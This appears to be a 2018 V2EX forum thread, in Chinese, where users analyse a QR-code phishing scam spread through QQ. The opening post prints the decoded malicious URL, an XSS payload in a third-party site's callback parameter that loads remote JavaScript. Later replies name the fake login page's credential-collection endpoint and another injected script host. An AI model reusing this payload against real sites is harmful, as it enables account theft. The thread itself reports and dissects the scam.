有没有腾讯的人啊。。好像出了个新漏洞???

2018-08-08 21:46:10 +08:00
 yejinmo

朋友自动发给我的,说是前不久他朋友发给他的,通过 QQ 传播的,需要在手机 QQ 上扫码

二维码解析后的恶意链接

http://comment.ali213.net/ali-comment-renotice.php?callback=%00%00%00%00%00%00%00%3CscripT/src=//633832.pywbm.cn/template/app.js%3E%3C/scripT%3E%3C!--

其中指向的恶意代码

http://633832.pywbm.cn/template/app.js

鹅厂员工调查下为啥会自动发给好友?

有没有搞安全的大佬研究下?

8725 次点击
所在节点    全球工单系统
41 条回复
yejinmo
2018-08-08 21:47:31 +08:00
恶意图片:

tangweihua163
2018-08-08 22:39:18 +08:00
屁大点事儿,又不是山( shan )洞( dong )佃( dian )妇( fu )
xmdhs
2018-08-08 22:48:37 +08:00
大概是他没看域名就输了密码吧

1024MB
2018-08-08 22:56:01 +08:00
这是人的漏洞,安全领域叫社会工程学,凯文叫它欺骗的艺术。so,你被骗了,叫警察的漏洞
e1el
2018-08-08 22:59:33 +08:00
这不叫漏洞,这叫
![]( )
lzxgh621
2018-08-08 23:04:51 +08:00
@e1el 不要在论坛发漩涡好吗。。。吓死了
yiqiao
2018-08-08 23:07:36 +08:00
@e1el 心理阴影
Lentin
2018-08-08 23:22:25 +08:00
这个应该是属于 @游侠网 ali213.net 的一个 XSS 漏洞,跟腾讯关系不大
Lentin
2018-08-08 23:25:24 +08:00
https://bbs.ichunqiu.com/thread-43894-1-1.html
其实腾讯也有锅,没有主动 XSS 探测,Chrome 很机智的检测出来了
34C
2018-08-09 02:44:07 +08:00
我想说那个二维码做得蛮好看的…… 有谁知道在哪生成的吗……
sdshdv
2018-08-09 03:22:25 +08:00
这种老骗术也就刚刚用 QQ 的小学生会上当
qiayue
2018-08-09 07:01:29 +08:00
最后网页会把假的登录框得到的账号和密码传输到 http://qzone.duboy.com.cn/user.php
之后跳转到 http://yunzhijia.com/microblog/filesvr/5b365ddd364a0f55c8d16590,给你看狗
AlisaDestiny
2018-08-09 07:46:06 +08:00
被插入的 js 地址:
```
http://qqq.brhrc.cn/template/login.js
```
![]( https://i.loli.net/2018/08/09/5b6b7ffdeb69b.png)
由于页面代码使用的 base64 编码和 arc4 加密,这是最终解码出来的页面代码:
```
https://paste.ubuntu.com/p/y98DWVZYMg/
```
这是账号提交的地址:
![]( https://i.loli.net/2018/08/09/5b6b80708e653.png)

我能做的就是这么多了。各位如何对待这个服务器请随意。
yamedie
2018-08-09 07:49:34 +08:00
@34C 联图 liantu.com
jiqing
2018-08-09 08:05:41 +08:00
@AlisaDestiny #12 兄弟你这怎么解码出来的
opengps
2018-08-09 08:07:17 +08:00
这是个老骗术,就是仿站,钓鱼拿到账号密码,你随便输入点他都会记录
yejinmo
2018-08-09 09:21:06 +08:00
@xmdhs #3
@Lentin #8
@Lentin #9
@sdshdv #11

腾讯的确是有很多服务要求你用手机 QQ 扫码登录之类的,只不过这个扫了码之后要求输入账号密码就很假了

想说手机 QQ 内置浏览器为什么没有 XSS 检测。。
yejinmo
2018-08-09 09:22:57 +08:00
@opengps #16

刚开始以为是以前分享攻击之类的,后来问清朋友是主动输入的账号密码被钓了
yejinmo
2018-08-09 09:28:46 +08:00
@34C #10

好像是作者自己弄的。。谷歌了一遍没找到相似图片
CokeMine
2018-08-09 09:43:12 +08:00
虚假登录界面

同二维码 以前差点中过招,还好最后回过神来了
我的好友好几个都被盗给我发一模一样的 zz 二维码了

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/478074

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX